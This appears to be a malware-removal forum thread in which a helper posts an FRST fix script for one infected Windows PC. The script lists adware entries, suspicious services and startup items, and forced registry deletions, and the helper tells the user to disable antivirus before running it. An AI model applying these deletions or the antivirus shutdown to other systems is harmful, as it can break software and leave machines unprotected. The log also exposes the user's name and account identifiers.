[2018-11-08] <==== ATTENTION CHR Profile: C:\Users\Огурцов\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2016-12-04] <==== ATTENTION CHR Extension: (No Name) - C:\Users\Огурцов\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ahggfmgiidlaceichjfemgbaggnbaloe [2017-11-02] CHR Extension: (Adblocker for Youtube™) - C:\Users\Огурцов\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\cpmgdbdchhjimcbfbbhlbchbobhjonna [2016-12-22] CHR Profile: C:\Users\Огурцов\AppData\Local\Google\Chrome\User Data\System Profile [2017-01-27] CHR Extension: (No Name) - C:\Users\Огурцов\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\ahggfmgiidlaceichjfemgbaggnbaloe [2017-11-02] CHR Extension: (Adblocker for Youtube™) - C:\Users\Огурцов\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\cpmgdbdchhjimcbfbbhlbchbobhjonna [2016-12-22] CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ahkmpjnmnhjkpkacdhkliipnncobgkhk] - hxxps://clients2.google.com/service/update2/crx 
CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo] - hxxp://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [gndelhfhcfbdhndfpcinebijfcjpmpec] - hxxp://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [oelpkepjlgmehajehfeicfbjdiobdkfj] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [phokcamelcbnjikjgomjjadeihhbbidh] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [ablpcikjmhamjanpibkccdmpoekjigja] - hxxp://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [aonedlchkbicmhepimiahfalheedjgbh] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [bhjhnafpiilpffhglajcaepjbnbjemci] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [ccfifbojenkenpkmnbnndeadpfdiffof] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [clgckgfbhciacomhlchmgdnplmdiadbj] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [hcadgijmedbfgciegjomfpjcdchlhnif] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: 
[ilhapdfjlmhfdgdbefpinebijmhjijpn] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [indjgiebmakhmnaplnlnanodkfiejfjd] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lhemechcanjmilllmccjbjldonmnnjjj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [oelpkepjlgmehajehfeicfbjdiobdkfj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ojlcebdkbpjdpiligkdbbkdkfjmchbfd] - hxxps://clients2.google.com/service/update2/crx
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Setmy\Application\chrome.exe <==== ATTENTION
S2 Anubophatuvot; C:\Program Files (x86)\Secockarercient\JahashargkCch.dll [X]
S2 Archer; C:\Program Files (x86)\WinArcher\Archer.dll [X] <==== ATTENTION
S2 Cercither; C:\Program Files (x86)\Natertionkacerse\PptPrv.dll [X]
S2 HPWombat Service; C:\Program Files (x86)\HPWombat\HPWombatSrv.exe [X] <==== ATTENTION
S2 InstallerService; C:\Program Files\TrueKey\Mcafee.TrueKey.InstallerService.exe -originalversion 4.4.127.0 [X]
S2 TrueKey; "C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe" [X]
S2 zutuzuni; C:\Program Files (x86)\87684081-1451210377-11CB-A5D0-F6E7D98D013F\jnsc7866.tmp [X] <==== ATTENTION
S1 kdvscdat; \??\C:\WINDOWS\system32\drivers\kdvscdat.sys [X]
S1 kkpqecnb; \??\C:\WINDOWS\system32\drivers\kkpqecnb.sys [X]
S1 zmyotbtz; \??\C:\WINDOWS\system32\drivers\zmyotbtz.sys [X]
2019-01-25 16:39 - 2019-01-25 16:39 - 000000062 ____C C:\Users\Огурцов\AppData\Roaming\at.txt
2019-01-19 16:05 - 2019-01-19 16:05 - 000000000 ___DC C:\ProgramData\ByteFence
2019-01-19 15:53 - 2019-01-19 15:53 - 000001046 ____C C:\Users\Огурцов\Desktop\ByteFence Anti-Malware.lnk
2019-01-19 15:53 - 2019-01-19 15:53 - 000000000 ___DC C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ByteFence Anti-Malware
2019-01-19 15:51 - 2019-01-19 15:51 - 000000000 ___DC C:\Users\Огурцов\AppData\Roaming\efixmypc.com
2019-01-19 15:50 - 2019-01-25 17:47 - 000000000 ___DC C:\Program Files\Advance PC-Care
Virustotal: C:\Users\Огурцов\Downloads\opengl.exe
Virustotal: C:\Users\Огурцов\Downloads\OneShot Русификатор.exe
2019-01-19 15:50 - 2019-01-19 15:50 - 000221302 ____C C:\Users\Огурцов\AppData\Roaming\DMGR_1N1I1F1S1T1I0M1F1Q2Y1I1P1B0C1F1Q1P.txt
2019-01-19 15:50 - 2019-01-19 15:50 - 000000860 ____C C:\Users\Public\Desktop\Advance PC-Care.lnk
2019-01-19 15:50 - 2019-01-19 15:50 - 000000000 ___DC C:\Users\Все пользователи\efixmypc.com
2019-01-19 15:50 - 2019-01-19 15:50 - 000000000 ___DC C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advance PC-Care
2019-01-19 15:50 - 2019-01-19 15:50 - 000000000 ___DC C:\ProgramData\efixmypc.com
2019-01-25 17:24 - 2018-12-27 17:23 - 000000000 _SHDC C:\ProgramData\mineonepapkavostonaj
2018-01-10 18:16 - 2018-01-10 18:16 - 000000288 ___HC () C:\Users\Огурцов\AppData\Roaming\3b01b117ec3368f4c02bec10fe19f5bfb929dd2b
2016-10-25 15:37 - 2016-10-25 15:37 - 007214592 ____C () C:\Users\Огурцов\AppData\Roaming\agent.dat
2016-10-25 15:37 - 2016-10-25 15:29 - 000710656 ____C () C:\Users\Огурцов\AppData\Roaming\Ansoft.exe
2016-10-25 15:37 - 2016-10-25 15:37 - 001910964 ____C () C:\Users\Огурцов\AppData\Roaming\Ansoft.tst
2019-01-19 15:50 - 2019-01-19 15:50 - 000221302 ____C () C:\Users\Огурцов\AppData\Roaming\DMGR_1N1I1F1S1T1I0M1F1Q2Y1I1P1B0C1F1Q1P.txt
2018-01-10 05:59 - 2018-01-10 05:59 - 000000128 ___HC () C:\Users\Огурцов\AppData\Roaming\ecf00c38dc807e105d881c433a6b455dd2c606b6
2015-12-27 13:03 - 2015-12-27 13:03 - 000005120 ____C () C:\Users\Огурцов\AppData\Roaming\GiftBag.db
2016-10-23 15:52 - 2016-10-25 15:34 - 000016368 ____C () C:\Users\Огурцов\AppData\Roaming\InstallationConfiguration.xml
2016-10-23 15:52 - 2016-10-25 15:29 - 000140288 ____C () C:\Users\Огурцов\AppData\Roaming\Installer.dat
2016-10-25 15:37 - 2016-10-25 15:37 - 000018432 ____C () C:\Users\Огурцов\AppData\Roaming\Main.dat
2016-10-25 15:37 - 2016-10-25 15:37 - 000005568 ____C () C:\Users\Огурцов\AppData\Roaming\md.xml
2016-10-25 15:37 - 2016-10-25 15:37 - 000126464 ____C () C:\Users\Огурцов\AppData\Roaming\noah.dat
2016-10-25 15:38 - 2016-10-25 15:38 - 000032038 ____C () C:\Users\Огурцов\AppData\Roaming\uninstall_temp.ico
2016-10-25 15:34 - 2016-10-25 15:34 - 000190394 ____C () C:\Users\Огурцов\AppData\Roaming\Vaiadax.bin
C:\Users\Огурцов\AppData\Local\Mail.Ru\MailRuUpdater.exe
C:\Users\Огурцов\AppData\Local\Mail.Ru
C:\program files (x86)\common files\tencent
Reg: reg delete "HKU\S-1-5-21-2316502943-295965077-1323287568-1001\Software\Microsoft\Windows\CurrentVersion\Uninstall\MailRuUpdater" /f
CMD: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}}" /f /reg:32
Reg: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UBar" /f
CMD: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Youtube AdBlock}" /f /reg:32
CMD: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}}" /f /reg:32
CMD: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ZaxarGameBrowser4_is1}" /f /reg:32
CMD: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ZaxarGameBrowser5_is1)" /f /reg:32
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ContextMenuHandlers1_S-1-5-21-2316502943-295965077-1323287568-1001: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ContextMenuHandlers4_S-1-5-21-2316502943-295965077-1323287568-1001: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ContextMenuHandlers5_S-1-5-21-2316502943-295965077-1323287568-1001: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
Task: {0D8A891D-890C-4808-84D8-2F436AB14653} - \Microsoft\Windows\Application Experience\AitAgent -> No File <==== ATTENTION
Task: {1274336E-AB06-46B6-A48C-0671C5557CC6} - \Microsoft\Windows\TaskScheduler\Maintenance Configurator -> No File <==== ATTENTION
Task: {1687544D-7247-4F5A-965A-A6E920E55278} - \Microsoft\Windows\TaskScheduler\Manual Maintenance -> No File <==== ATTENTION
Task: {40525C58-79C2-47A1-9AA2-F1D7FC4F0691} - \Microsoft\Windows\WindowsBackup\ConfigNotification -> No File <==== ATTENTION
Task: {41699307-0CBD-47C4-B41E-61216AD1EE7D} - System32\Tasks\DriverPack Cloud => C:\Program Files (x86)\DriverPack Cloud\cloud.exe
Task: {6F02587F-8A2B-4552-97F6-DEEF229E335B} - \Microsoft\Windows\TaskScheduler\Idle Maintenance -> No File <==== ATTENTION
Task: {B7992938-01F1-4F40-A0EC-0D23D2F0F152} - \Microsoft\Windows\TaskScheduler\Regular Maintenance -> No File <==== ATTENTION
Task: {CFD7C21A-808B-487B-A6EC-8A10E44E8360} - \Microsoft\Windows\SettingSync\BackupTask -> No File <==== ATTENTION
Task: {DA093982-3E58-440C-AC74-B5DD36D60170} - System32\Tasks\MailRuUpdater => C:\Users\Огурцов\AppData\Local\Mail.Ru\MailRuUpdater.exe [2017-11-24] (Mail.Ru) <==== ATTENTION
Task: {E431B18E-FF30-412E-956A-F9E0DB99445C} - System32\Tasks\CrashRptz => C:\Users\Огурцов\AppData\Local\CrashRpt\CrashRptz.exe
WMI:subscription\__FilterToConsumerBinding->LogFileEventConsumer.Name=\"DeviceChangeConsumer\"",Filter="__EventFilter.Name=\"DeviceChangeFilter\"::
WMI:subscription\__EventFilter->DeviceChangeFilter::[Query => select * from __instanceOperationEvent within 10 where targetInstance isa 'win32_PnPEntity']
WMI:subscription\LogFileEventConsumer->DeviceChangeConsumer::
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\QQPCRTP => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\QQPCRTP => ""="service"
HKLM\...\StartupApproved\StartupFolder: => "Zaxar Games Browser.lnk"
HKLM\...\StartupApproved\StartupFolder: => "McAfee Security Scan Plus.lnk"
HKLM\...\StartupApproved\Run: => "WindowsDefender"
HKLM\...\StartupApproved\Run32: => "DiskPower"
HKLM\...\StartupApproved\Run32: => "IconRunner"
HKLM\...\StartupApproved\Run32: => "PWRISOVM.EXE"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\StartupFolder: => "ProfitTaskMonitor.lnk"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "amigo"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "1D8NLRRVNF"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "1IHC5CK5HN"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "3UY4CSROFQ"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "hdtask"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "MailRuUpdater"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "299GTXK38W"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "LTCCY5NFU4"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "RI7FIMYQGU"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "CIUOLCHQV6"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "52THSX3HBL"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "U3VZY4RS3N"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "7S0YZZDLPN"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "ADUE8JHHLJ"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "V527APOCWN"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "E6H6A1LMPM"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "FPEFT4XU1J"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "95RTWV2W37"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "9IO1NQKL9A"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "5YGZRUKDMF"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "17Z9ZGZLNZ"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "mailruhomesearch"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "K8J77YTFGJ"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "6GMTU8RLCT"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "RMIW4E6JXC"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "ycAutoLaunch_1C57F4F4FD8066828BC5E4D43E9AF813"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "Orbitum Update"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "CurrencyConvertor"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "aebleyzkpy"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "LumProcess"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_918ABA8B1445D313589FE9A369122F26"
FirewallRules: [{D4A13780-20C2-4677-A94E-DC0390ECA138}] => (Allow) C:\Users\Огурцов\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe No File
FirewallRules: [{BEE75AB0-0CA6-42F8-A2F2-FA7A850F3068}] => (Allow) C:\program files (x86)\common files\tencent\qqdownload\130\tencentdl.exe (Tencent)
FirewallRules: [{89046AB3-85C2-4A93-902E-3A04E8816CD4}] => (Allow) C:\program files (x86)\common files\tencent\qqdownload\130\bugreport_xf.exe ()
FirewallRules: [{3A71A011-3C8C-4223-83B3-F74CA82E473F}] => (Allow) C:\Program Files\UBar\ubar.exe No File
FirewallRules: [{7173787B-DE1F-489E-9E94-23F93F139957}] => (Allow) C:\Program Files (x86)\Setmy\Application\chrome.exe No File
FirewallRules: [{D8E881C5-2077-4392-94A6-D566049C04AB}] => (Allow) C:\Program Files (x86)\Opera\opera.exe No File
FirewallRules: [{AFA9F0FE-AC37-4B04-8BF4-AC43018C5F7A}] => (Allow) C:\Program Files (x86)\Opera\opera.exe No File
FirewallRules: [{84310AF7-A8CF-4D83-8AE9-1E1C1D2AA2A4}] => (Block) %ProgramFiles% (x86)\Bandicam\bdcam.exe No File
FirewallRules: [{D5F2A808-CA1B-4949-8377-CD9690005013}] => (Allow) C:\Users\Огурцов\AppData\Local\Amigo\Application\amigo.exe No File
FirewallRules: [{45D538B8-C1A2-4846-B333-E0F53B95CB78}] => (Allow) C:\Users\Огурцов\AppData\Local\yc\Application\yc.exe No File
Reboot:
Disable your antivirus until the reboot, close all browsers, run FRST.EXE/FRST64.EXE, click Fix once and wait. The program will create a log file (Fixlog.txt). Attach it to your next message.
The computer will be rebooted automatically.
Make a Malwarebytes AdwCleaner log.
WBR,
Vadim
Statistics of the treatment performed:
- Quarantines received: 2
- Files processed: 7
- During the treatment, no malicious programs were found in the quarantines
Dear Foxwill, our specialists have given you all the help they could with your request.
To keep your computer secure, we strongly recommend:
To always stay up to date on current information security threats and keep your computer protected, we recommend following the latest IT news on the Anti-Malware.ru portal:
We hope never to see your computer infected again!
If it is not too much trouble, please contribute to our database of safe files.